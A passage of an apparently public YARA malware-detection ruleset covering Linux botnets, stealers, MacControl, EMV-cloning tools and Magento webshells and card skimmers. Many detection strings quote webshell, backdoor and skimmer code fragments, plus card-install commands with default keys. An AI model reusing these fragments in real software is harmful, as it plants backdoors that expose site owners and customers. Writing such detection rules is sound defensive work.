        author = "Joan Soriano / @w0lfvan"
        date = "2017-10-19"
        version = "1.0"
        MD5 = "1a35193f3761662a9a1bd38b66327f49"
        SHA256 = "72c2e804f185bef777e854fe86cff3e86f00290f32ae8b3cb56deedf201f1719"
    strings:
        // Credential-report format and two status messages; all required.
        $a = "LIKE A GOD!!! IP:%s User:%s Pass:%s"
        $b = "smack"
        $c = "PEACE OUT IMMA DUP\n"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

// Linux/Moose yara rules
// For feedback or questions contact us at: github@eset.com
// https://github.com/eset/malware-ioc/
//
// These yara rules are provided to the community under the two-clause BSD
// license as follows:
//
// Copyright (c) 2015, ESET
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
// 1. Redistributions of source code must retain the above copyright notice, this
// list of conditions and the following disclaimer.
//
// 2. Redistributions in binary form must reproduce the above copyright notice,
// this list of conditions and the following disclaimer in the documentation
// and/or other materials provided with the distribution.
// // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE // DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE // FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL // DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER // CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, // OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // private rule is_elf { strings: $header = { 7F 45 4C 46 } condition: $header at 0 } rule moose { meta: Author = "Thomas Dupuy" Date = "2015/04/21" Description = "Linux/Moose malware" Reference = "http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf" Source = "https://github.com/eset/malware-ioc/" Contact = "github@eset.com" License = "BSD 2-Clause" strings: $s0 = "Status: OK" $s1 = "--scrypt" $s2 = "stratum+tcp://" $s3 = "cmd.so" $s4 = "/Challenge" $s7 = "processor" $s9 = "cpu model" $s21 = "password is wrong" $s22 = "password:" $s23 = "uthentication failed" $s24 = "sh" $s25 = "ps" $s26 = "echo -n -e " $s27 = "chmod" $s28 = "elan2" $s29 = "elan3" $s30 = "chmod: not found" $s31 = "cat /proc/cpuinfo" $s32 = "/proc/%s/cmdline" $s33 = "kill %s" condition: is_elf and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. 
*/

import "pe"

rule lost_door : Trojan
{
    meta:
        author="Kevin Falcoz"
        date="23/02/2013"
        description="Lost Door"
    strings:
        // Plain ASCII "EDIT_SERVER"; as the only string in the condition this
        // will also fire on benign files that happen to contain the token.
        $signature1={45 44 49 54 5F 53 45 52 56 45 52} /*EDIT_SERVER*/
    condition:
        $signature1
}

rule LuaBot : MALW
{
    meta:
        description = "LuaBot"
        author = "Joan Soriano / @joanbtl"
        date = "2017-06-07"
        version = "1.0"
        MD5 = "9df3372f058874fa964548cbb74c74bf"
        SHA1 = "89226865501ee7d399354656d870b4a9c02db1d3"
        ref1 = "http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html"
    strings:
        $a = "LUA_PATH"
        $b = "Hi. Happy reversing, you can mail me: luabot@yandex.ru"
        $c = "/tmp/lua_XXXXXX"
        $d = "NOTIFY"
        $e = "UPDATE"
    condition:
        all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule LuckyCatCode : LuckyCat Family
{
    meta:
        description = "LuckyCat code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-19"
    strings:
        $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B }
        $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C }
        $commonletters = { B? 63 B? 61 B? 73 B? 65 }
    condition:
        $xordecrypt or ($dll and $commonletters)
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

rule MSILStealer
{
    meta:
        description = "Detects strings from C#/VB Stealers and QuasarRat"
        reference = "https://github.com/quasar/QuasarRAT"
        author = "https://github.com/hwvs"
        last_modified = "2019-11-21"
    strings:
        $ = "Firefox does not have any profiles, has it ever been launched?" wide ascii
        $ = "Firefox is not installed, or the install path could not be located" wide ascii
        $ = "No installs of firefox recorded in its key." wide ascii
        $ = "{0}\\\\FileZilla\\\\recentservers.xml" wide ascii
        $ = "{1}{0}Cookie Name: {2}{0}Value: {3}{0}Path" wide ascii
        $ = "[PRIVATE KEY LOCATION: \\\"{0}\\\"]" wide ascii
    condition:
        1 of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

import "pe"

rule MacControlCode : MacControl Family
{
    meta:
        description = "MacControl code tricks"
        author = "Seth Hardy"
        last_modified = "2014-06-17"
    strings:
        // Load these function strings 4 characters at a time. These check the first two blocks:
        $L4_Accept = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 3A 20 }
        $L4_AcceptLang = { C7 ?? 41 63 63 65 C7 ?? 04 70 74 2D 4C }
        $L4_Pragma = { C7 ?? 50 72 61 67 C7 ?? 04 6D 61 3A 20 }
        $L4_Connection = { C7 ?? 43 6F 6E 6E C7 ?? 04 65 63 74 69 }
        $GEThgif = { C7 ?? 47 45 54 20 C7 ?? 04 2F 68 2E 67 }
    condition:
        all of ($L4*) or $GEThgif
}

rule MacControlStrings : MacControl Family
{
    meta:
        description = "MacControl Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-17"
    strings:
        $ = "HTTPHeadGet"
        $ = "/Library/launched"
        $ = "My connect error with no ip!"
        $ = "Send File is Failed"
        $ = "****************************You Have got it!****************************"
    condition:
        any of them
}

// Umbrella rule: fires when either the code-pattern or the string rule above fires.
rule MacControl : Family
{
    meta:
        description = "MacControl"
        author = "Seth Hardy"
        last_modified = "2014-06-16"
    condition:
        MacControlCode or MacControlStrings
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

rule MacGyverCap : MacGyver
{
    meta:
        description = "Generic rule for MacGyver.cap"
        author = "xylitol@temari.fr"
        date = "2021-05-11"
        reference = "https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf"
        // May only the challenge guide you
        hash1 = "9dc70002e82c78ee34c813597925c6cf8aa8d68b7e9ce5bcc70ea9bcab9dbf4a"
    strings:
        // Component paths of a JavaCard CAP archive built from a package named MacGyver.
        $string1 = "src/MacGyver/javacard/Header.cap" ascii wide
        $string2 = "src/MacGyver/javacard/Directory.cap" ascii wide
        $string3 = "src/MacGyver/javacard/Applet.cap" ascii wide
        $string4 = "src/MacGyver/javacard/Import.cap" ascii wide
        $string5 = "src/MacGyver/javacard/ConstantPool.cap" ascii wide
        $string6 = "src/MacGyver/javacard/Class.cap" ascii wide
        $string7 = "src/MacGyver/javacard/Method.cap" ascii wide
    condition:
        all of them
}

rule MacGyverCapInstaller : MacGyvercap Installer
{
    meta:
        description = "Generic rule for Hacktool:Win32/EMVSoft who install MacGyver.cap"
        author = "xylitol@temari.fr"
        date = "2021-05-11"
        reference = "https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf"
        // May only the challenge guide you
        hash1 = "bb828eb0bbebabbcb51f490f4a0c08dd798b1f350dddddb6c00abcb6f750069f"
        hash2 = "04f0c9904675c7cf80ff1962bec5ef465ccf8c29e668f3158ec262414a6cc6eb"
        hash3 = "7335cd56a9ac08c200cca7e25b939e9c4ffa4d508207e68bee01904bf20a6528"
        hash4 = "af542ccb415647dbd80df902858a3d150a85f37992a35f29999eed76ac01a12b"
        hash5 = "247484124f4879bfacaae73ea32267e2c1e89773986df70a5f3456b1fb944c58"
        hash6 = "1cc8a2f3ce12f4b8356bda8b4aaf61d510d1078112af1c14cf4583090e062fbe"
        hash7 = "c23411deeec790e2dba37f4c49c7ecac3c867b7012431c9281ed748519eda65c"
        hash8 = "c0d11ed2eed0fef8d2f53920a1e12f667e03eafdb2d2941473d120e9e6f0e657"
        hash9 = "1ecfd3755eba578108363c0705c6ec205972080739ed0fbd17439f8139ba7e08"
        hash10 = "87678c6dcf0065ffc487a284b9f79bd8c0815c5c621fc92f83df24393bfcc660"
    strings:
        // The AID hex decodes to "1PAY.SYS.DDF01" (the EMV payment system directory).
        $string1 = "delete -AID 315041592e5359532e4444463031" ascii wide
        $string2 = "install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4" ascii wide
        // 40 41 ... 4F is the well-known GlobalPlatform default card key.
        $string3 = "-mac_key 404142434445464748494a4b4c4d4e4f" ascii wide
        $string4 = "-enc_key 404142434445464748494a4b4c4d4e4f" ascii wide
    condition:
        all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

rule Madness : DoS
{
    meta:
        author = "Jason Jones <jasonjones@arbor.net>"
        date = "2014-01-15"
        description = "Identify Madness Pro DDoS Malware"
        source = "https://github.com/arbor/yara/blob/master/madness.yara"
    strings:
        // Base64-encoded browser User-Agent strings carried by the bot.
        $ua1 = "TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE"
        $ua2 = "TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ=="
        $str1= "document.cookie=" fullword
        $str2 = "[\"cookie\",\"" fullword
        $str3 = "\"realauth=" fullword
        $str4 = "\"location\"];" fullword
        // "d3Rm" and "ZXhl" are base64 for "wtf" and "exe".
        $str5 = "d3Rm" fullword
        $str6 = "ZXhl" fullword
    condition:
        all of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

/*
    ref : https://github.com/gwillem/magento-malware-scanner/blob/master/rules/backend.yar
    author : https://github.com/gwillem
*/

rule dump_sales_quote_payment
{
    strings:
        $ = "include '../../../../../../../../../../app/Mage.php'; Mage::app(); $q = Mage::getModel('sales/quote_payment')->getCollection();"
    condition:
        any of them
}

rule dump_sales_order
{
    strings:
        $ = "../../../../../../app/Mage.php'; Mage::app(); var_dump(Mage::getModel('sales/order')"
    condition:
        any of them
}

rule md5_64651cede2467fdeb1b3b7e6ff3f81cb
{
    strings:
        $ = "rUl6QttVEP5eqf9usxfJjgoOvdNWFSGoHDgluk+4ONwXQNbGniQLttfyrgkB8d9"
    condition:
        any of them
}

rule md5_6bf4910b01aa4f296e590b75a3d25642
{
    strings:
        $ = "base64_decode('b25lcGFnZXxnY19hZG1pbg==')"
    condition:
        any of them
}

rule fopo_webshell
{
    strings:
        $ = "DNEcHdQbWtXU3dSMDA1VmZ1c29WUVFXdUhPT0xYb0k3ZDJyWmFVZlF5Y0ZEeHV4K2FnVmY0OUtjbzhnc0"
        $ = "U3hkTVVibSt2MTgyRjY0VmZlQWo3d1VlaFJVNVNnSGZUVUhKZXdEbGxJUTlXWWlqWSt0cEtacUZOSXF4c"
        $ = "rb2JHaTJVdURMNlhQZ1ZlTGVjVnFobVdnMk5nbDlvbEdBQVZKRzJ1WmZUSjdVOWNwWURZYlZ0L1BtNCt"
    condition:
        any of them
}

rule eval_post
{
    strings:
        $ = "eval(base64_decode($_POST"
        $ = "eval($undecode($tongji))"
        $ = "eval($_POST"
    condition:
        any of them
}

rule spam_mailer
{
    strings:
        $ = "<strong>WwW.Zone-Org</strong>"
        $ = "echo eval(urldecode("
    condition:
        any of them
}

rule md5_0105d05660329704bdb0ecd3fd3a473b
{
    /* )){eval (${ $njap58}['q9e5e25' ]) ) ) { eval ( ${$yed7 }[' */
    strings:
        $ = /\)\s*\)\s*\{\s*eval\s*\(\s*\$\{/
    condition:
        any of them
}

rule md5_0b1bfb0bdc7e017baccd05c6af6943ea
{
    /*
        eval(hnsqqh($llmkuhieq, $dbnlftqgr));?>
        eval(vW91692($v7U7N9K, $v5N9NGE));?>
    */
    strings:
        $ = /eval\([\w\d]+\(\$[\w\d]+, \$[\w\d]+\)\);/
    condition:
        any of them
}

rule md5_2495b460f28f45b40d92da406be15627
{
    strings:
        $ = "$dez = $pwddir.\"/\".$real;copy($uploaded, $dez);"
    condition:
        any of them
}

rule md5_2c37d90dd2c9c743c273cb955dd83ef6
{
    strings:
        $ = "@$_($_REQUEST['"
    condition:
        any of them
}

rule md5_3ccdd51fe616c08daafd601589182d38
{
    strings:
        $ = "eval(xxtea_decrypt"
    condition:
        any of them
}

rule md5_4b69af81b89ba444204680d506a8e0a1
{
    strings:
        $ = "** Scam Redirector"
    condition:
        any of them
}

rule md5_71a7c769e644d8cf3cf32419239212c7
{
    /* // $GLOBALS['ywanc2']($GLOBALS['ggbdg61'] */
    strings:
        $ = /\$GLOBALS\['[\w\d]+'\]\(\$GLOBALS\['[\w\d]+'\]/
    condition:
        any of them
}

rule md5_825a3b2a6abbe6abcdeda64a73416b3d
{
    /*
        // $ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_SERVER["SERVER_NAME"]);
        // if(!oo00o0OOo0o00O("fsockopen"))
        // strings: $ = "$ooooo00oo0000oo0"
    */
    strings:
        $ = /[o0O]{3}\("fsockopen"\)/
    condition:
        any of them
}

rule md5_87cf8209494eedd936b28ff620e28780
{
    strings:
        $ = "curl_close($cu);eval($o);};die();"
    condition:
        any of them
}

rule md5_9b59cb5b557e46e1487ef891cedaccf7
{
    strings:
        // JFIF header: SOI (FF D8), APP0 marker (FF E0), two length bytes, "JFIF\0", version byte 01.
        $jpg = { FF D8 FF E0 ?? ?? 4A 46 49 46 00 01 }
        /*
            // https://en.wikipedia.org/wiki/List_of_file_signatures
            // magic module is not standard compiled in on our platform
            // otherwise: condition: magic.mime_type() == /^image/
            // $jpg = { 4A 46 49 46 00 01 }
        */
        $php = "<?php"
    condition:
        // A file that looks like a JPEG but carries a PHP open tag anywhere.
        ($jpg at 0) and $php
}

rule md5_c647e85ad77fd9971ba709a08566935d
{
    strings:
        $ = "fopen(\"cache.php\", \"w+\")"
    condition:
        any of them
}

rule md5_fb9e35bf367a106d18eb6aa0fe406437
{
    strings:
        $ = "0B6KVua7D2SLCNDN2RW1ORmhZRWs/sp_tilang.js"
    condition:
        any of them
}

rule md5_8e5f7f6523891a5dcefcbb1a79e5bbe9
{
    strings:
        $ = "if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<b>up!!!</b><br><br>';}}"
    condition:
        any of them
}

rule indoexploit_autoexploiter
{
    strings:
        $ = "echo \"IndoXploit - Auto Xploiter\""
    condition:
        any of them
}

rule eval_base64_decode_a
{
    strings:
        $ = "eval(base64_decode($a));"
    condition:
        any of them
}

rule obfuscated_eval
{
    strings:
        // "\x65\x76\x61\x6C" is "eval" spelled with hex escapes.
        $ = /\\x65\s*\\x76\s*\\x61\s*\\x6C/
        $ = "\"/.*/e\""
    condition:
        any of them
}

rule md5_50be694a82a8653fa8b31d049aac721a
{
    strings:
        $ = "(preg_match('/\\/admin\\/Cms_Wysiwyg\\/directive\\/index\\//', $_SERVER['REQUEST_URI']))"
    condition:
        any of them
}

rule md5_ab63230ee24a988a4a9245c2456e4874
{
    strings:
        $ = "eval(gzinflate(base64_decode(str_rot13(strrev("
    condition:
        any of them
}

rule md5_b579bff90970ec58862ea8c26014d643
{
    /* forces php execution of image files, dropped in an .htaccess file under media */
    strings:
        $ = /<Files [^>]+.(jpg|png|gif)>\s*ForceType application\/x-httpd-php/
    condition:
        any of them
}

rule md5_d30b23d1224438518d18e90c218d7c8b
{
    strings:
        // 0x70617373776f72645f68617368 is "password_hash" in hex.
        $ = "attribute_code=0x70617373776f72645f68617368"
    condition:
        any of them
}

rule md5_24f2df1b9d49cfb02d8954b08dba471f
{
    strings:
        $ = "))unlink('../media/catalog/category/'.basename($"
    condition:
        any of them
}

rule base64_hidden_in_image
{
    strings:
        $ = /JPEG-1\.1[a-zA-Z0-9\-\/]{32}/
    condition:
        any of them
}

rule hide_data_in_jpeg
{
    strings:
        $ = /file_put_contents\(\$.{2,3},'JPEG-1\.1'\.base64_encode/
    condition:
        any of them
}

rule hidden_file_upload_in_503
{
    strings:
        $ = /error_reporting\(0\);\$f=\$_FILES\[\w+\];copy\(\$f\[tmp_name\],\$f\[name\]\);error_reporting\(E_ALL\);/
    condition:
        any of them
}

rule md5_fd141197c89d27b30821f3de8627ac38
{
    strings:
        $ = "if(isset($_GET['do'])){$g0='adminhtml/default/default/images'"
    condition:
        any of them
}

rule visbot
{
    strings:
        $ = "stripos($buf, 'Visbot')!==false && stripos($buf, 'Pong')!==false"
        $ = "stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong')"
    condition:
        any of them
}

rule md5_39ca2651740c2cef91eb82161575348b
{
    strings:
        $ = /if\(md5\(@\$_COOKIE\[..\]\)=='.{32}'\) \(\$_=@\$_REQUEST\[.\]\).@\$_\(\$_REQUEST\[.\]\);/
    condition:
        any of them
}

rule md5_4c4b3d4ba5bce7191a5138efa2468679
{
    strings:
        $ = "<?PHP /*** Magento** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:* http://opensource.org/licenses/osl-3.0.php**/$"
        $ = "$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'"
    condition:
        any of them
}

rule md5_6eb201737a6ef3c4880ae0b8983398a9
{
    strings:
        $ = "if(md5(@$_COOKIE[qz])=="
        $ = "($_=@$_REQUEST[q]).@$_($_REQUEST[z]);"
    condition:
        all of them
}

rule md5_d201d61510f7889f1a47257d52b15fa2
{
    strings:
        $ = "@eval(stripslashes($_REQUEST[q]));"
    condition:
        any of them
}

rule md5_06e3ed58854daeacf1ed82c56a883b04
{
    strings:
        $ = "$log_entry = serialize($ARINFO)"
    condition:
        any of them
}

rule md5_28690a72362e021f65bb74eecc54255e
{
    strings:
        $ = "curl_setopt($ch, CURLOPT_POSTFIELDS,http_build_query(array('data'=>$data,'utmp'=>$id)));"
    condition:
        any of them
}

rule overwrite_globals_hack
{
    strings:
        $ = /\$GLOBALS\['[^']{,20}'\]=Array\(/
    condition:
        any of them
}

rule md5_4adef02197f50b9cc6918aa06132b2f6
{
    /* { eval($cco37(${ $kasd1}[ 'n46b398' ] ) );} */
    strings:
        $ = /\{\s*eval\s*\(\s*\$.{1,5}\s*\(\$\{\s*\$.{1,5}\s*\}\[\s*'.{1,10}'\s*\]\s*\)\s*\);\}/
    condition:
        any of them
}

rule obfuscated_globals
{
    /* $GLOBALS['y63581'] = "\x43 */
    strings:
        $ = /\$GLOBALS\['.{1,10}'\] = "\\x/
    condition:
        any of them
}

rule ld_preload_backdoor
{
    strings:
        $ = "killall -9 \".basename(\"/usr/bin/host"
    condition:
        any of them
}

rule fake_magentoupdate_site
{
    strings:
        $ = "magentopatchupdate.com"
    condition:
        any of them
}

rule md5_b3ee7ea209d2ff0d920dfb870bad8ce5
{
    strings:
        $ = /\$mysql_key\s*=\s*@?base64_decode/
        $ = /eval\(\s*\$mysql_key\s*\)/
    condition:
        all of them
}

rule md5_e03b5df1fa070675da8b6340ff4a67c2
{
    strings:
        $ = /if\(preg_match\("\/onepage\|admin\/",\s*\$_SERVER\['REQUEST_URI'\]\)\)\{\s*@?file_put_contents/
        $ = /@?base64_encode\(serialize\(\$_REQUEST\)\."--"\.serialize\(\$_COOKIE\)\)\."\\n",\s*FILE_APPEND\)/
    condition:
        any of them
}

rule md5_023a80d10d10d911989e115b477e42b5
{
    strings:
        $ = /chr\(\d{,3}\)\.\"\"\.chr\(\d{,3}\)/
    condition:
        any of them
}

rule md5_4aa900ddd4f1848a15c61a9b7acd5035
{
    strings:
        $ = "'base'.(128/2).'_de'.'code'"
    condition:
        any of them
}

rule md5_f797dd5d8e13fe5c8898dbe3beb3cc5b
{
    strings:
        $ = "echo(\"FILE_Bad\");"
    condition:
        any of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

/*
    ref : https://github.com/gwillem/magento-malware-scanner
    author : https://github.com/gwillem
*/

rule onepage_or_checkout
{
    strings:
        // Hex-escaped "onepage|checkout".
        $ = "\\x6F\\x6E\\x65\\x70\\x61\\x67\\x65\\x7C\\x63\\x68\\x65\\x63\\x6B\\x6F\\x75\\x74"
    condition:
        any of them
}

rule sinlesspleasure_com
{
    strings:
        $ = "5e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92"
    condition:
        any of them
}

rule amasty_biz
{
    strings:
        // Decimal char codes for "var snd =null;\n\nfu".
        $ = "118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117"
    condition:
        any of them
}

rule amasty_biz_js
{
    strings:
        $ = "t_p#0.qlb#0.#1Blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0"
    condition:
        any of them
}

rule returntosender
{
    strings:
        // Hex-escaped path of a PHP file hidden under a Magento media cache directory.
        $ = "\\x2F\\x6D\\x65\\x64\\x69\\x61\\x2F\\x63\\x61\\x74\\x61\\x6C\\x6F\\x67\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x2F\\x63\\x61\\x63\\x68\\x65\\x2F\\x31\\x2F\\x74\\x68\\x75\\x6D\\x62\\x6E\\x61\\x69\\x6C\\x2F\\x37\\x30\\x30\\x78\\x2F\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2F\\x42\\x2F\\x57\\x2F\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2E\\x70\\x68\\x70"
    condition:
        any of them
}

rule ip_5uu8_com
{
    strings:
        // Hex-escaped "ip.5uu8.com".
        $ = "\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d"
    condition:
        any of them
}

rule cloudfusion_me
{
    strings:
        // HTML numeric entities for "cloudfusion.me".
        $ = "&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;"
    condition:
        any of them
}

rule grelos_v
{
    strings:
        $ = "var grelos_v"
    condition:
        any of them
}

rule hacked_domains
{
    strings:
        $ = "infopromo.biz"
        $ = "jquery-code.su"
        $ = "jquery-css.su"
        $ = "megalith-games.com"
        $ = "cdn-cloud.pw"
        $ = "animalzz921.pw"
        $ = "statsdot.eu"
    condition:
        any of them
}

rule mage_cdn_link
{
    strings:
        // Hex-escaped "mage-cdn.link".
        $ = "\\x6D\\x61\\x67\\x65\\x2D\\x63\\x64\\x6E\\x2E\\x6C\\x69\\x6E\\x6B"
    condition:
        any of them
}

rule credit_card_regex
{
    strings:
        $ = "RegExp(\"[0-9]{13,16}\")"
    condition:
        any of them
}

rule jquery_code_su
{
    strings:
        // Decimal char codes for "if((new RegExp('onepage".
        $ = "105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101"
    condition:
        any of them
}

rule jquery_code_su_multi
{
    strings:
        $ = "=oQKpkyJ8dCK0lGbwNnLn42bpRXYj9GbENDft12bkBjM8V2Ypx2c8Rnbl52bw12bDlkUVVGZvNWZkZ0M85WavpGfsJXd8R1UPB1NywXZtFmb0N3box"
    condition:
        any of them
}

rule Trafficanalyzer_js
{
    strings:
        $ = "z=x['length'];for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)-10) }w=this['unescape'](y);this['eval'](w);"
    condition:
        any of them
}

rule atob_js
{
    strings:
        $ = "this['eval'](this['atob']('"
    condition:
        any of them
}

rule gate_php_js
{
    /* token=KjsS29Msl&host= */
    strings:
        $ = /\/gate.php\?token=.{,10}&host=/
    condition:
        any of them
}

rule googieplay_js
{
    strings:
        // A <script src=...> tag with every byte shifted up by one.
        $ = "tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?"
    condition:
        any of them
}

rule mag_php_js
{
    strings:
        $ = "onepage|checkout|onestep|firecheckout|onestepcheckout"
        $ = "'one|check'"
    condition:
        any of them
}

rule thetech_org_js
{
    strings:
        $ = "|RegExp|onepage|checkout|"
    condition:
        any of them
}

rule md5_cdn_js_link_js
{
    strings:
        $ = "grelos_v= null"
    condition:
        any of them
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

/*
    ref : https://github.com/gwillem/magento-malware-scanner/
    author : https://github.com/gwillem
*/

rule fromCharCode_in_unicode
{
    strings:
        // "fromCharCode" written as \uXXXX escapes.
        $ = "\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065"
    condition:
        any of them and filesize < 500KB
}

rule function_through_object
{
    strings:
        $ = "['eval']"
        $ = "['unescape']"
        $ = "['charCodeAt']"
        $ = "['fromCharCode']"
    condition:
        any of them and filesize < 500KB
}

rule hex_script
{
    strings:
        // Hex-escaped `script"`.
        $ = "\\x73\\x63\\x72\\x69\\x70\\x74\\x22"
    condition:
        any of them and filesize < 500KB
}

rule php_malfunctions
{
    strings:
        $ = "eval("
        $ = "gzinflate("
        $ = "str_rot13("
        $ = "base64_decode("
    condition:
        // Three of four decode/execute calls in one small file.
        3 of them and filesize < 500KB
}

rule php_obf_malfunctions
{
    strings:
        $ = "eval(base64_decode"
        $ = "eval(gzinflate"
        $ = "str_rot13(base64_decode"
    condition:
        any of them and filesize < 500KB
}

rule fopo_obfuscator
{
    strings:
        $ = "www.fopo.com.ar"
    condition:
        any of them and filesize < 500KB
}

rule obf_base64_decode
{
    strings:
        // "base64_decode" spelled with a mix of hex (\x..) and octal (\145, \143, \144) escapes.
        $ = "\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145"
    condition:
        any of them and filesize < 500KB
}

rule html_upload
{
    strings:
        $ = "<input type='submit' name='upload' value='upload'>"
        $ = "if($_POST['upload'])"
    condition:
        any of them and filesize < 500KB
}

rule php_uname
{
    strings:
        $ = "php_uname()"
    condition:
        any of them and filesize < 500KB
}

rule scriptkiddies
{
    strings:
        $ = "lastc0de@Outlook.com" nocase
        $ = "CodersLeet" nocase
        $ = "AgencyCaFc" nocase
        $ = "IndoXploit" nocase
        $ = "Kapaljetz666" nocase
    condition:
        any of them and filesize < 500KB
}

rule eval_with_comments
{
    strings:
        // eval followed by a block comment before its opening parenthesis.
        $ = /(^|\s)eval\s*\/\*.{,128}\*\/\s*\(/
    condition:
        any of them and filesize < 500KB
}

/*
    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html)
    and open to any user or organization, as long as you use it under this license.
*/

/*
    Description: This rule keys on email headers that may have been sent from a malicious PHP script on a compromised webserver.
    Priority: 4
    Scope: Against Email
    Tags: None
    Author: P.Burbage
    Created in PhishMe's Triage on September 1, 2015 1:43 PM
*/
rule PM_Email_Sent_By_PHP_Script
{
    strings:
        $php1="X-PHP-Script" fullword
        $php2="X-PHP-Originating-Script" fullword
        $php3="/usr/bin/php" fullword
    condition:
        any of them
}

/*
    Description: Hits on ZIP attachments that contain *.js or *.jse - usually JS Dropper malware that has downloaded Kovter & Boaxee in the past.
    Priority: 5
    Scope: Against Attachment
    Tags: FileID
    Author: P.Burbage
    Created in PhishMe's Triage on September 1, 2015 1:43 PM
*/
rule PM_Zip_with_js
{
    strings:
        $hdr="PK"
        // NOTE(review): ".jse" always contains ".js", so $e2 can never fire where $e1 does not.
        $e1=".js" nocase
        $e2=".jse" nocase
    condition:
        // Extension is searched only in the file tail, presumably because a ZIP's
